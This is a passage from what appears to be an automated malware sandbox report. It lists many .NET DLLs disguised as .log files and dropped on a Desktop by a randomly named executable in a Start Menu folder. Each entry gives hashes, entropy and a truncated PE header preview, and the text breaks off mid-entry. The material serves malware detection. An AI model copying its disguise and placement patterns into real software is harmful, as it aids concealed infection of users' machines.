                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\jEwQkWoc.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\jFHPguuZ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\jGqnAmhH.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\jIzxpLYw.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\jKExtYKb.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\jLOQRvWt.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\jaGPEhSy.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\kBXYGWDW.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\kDcZKjpC.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                        C:\Users\user\Desktop\kGyWBgAx.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\kMzZuVIy.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\kPsHDmnV.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\kbBrEeQW.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\kplGuznc.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\kqZnADfT.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\kxbWRuhA.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\lZLXuWSy.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                        C:\Users\user\Desktop\lfIQBAUr.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\luCemuwv.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\lzFWljSG.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\mOmHPFNu.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
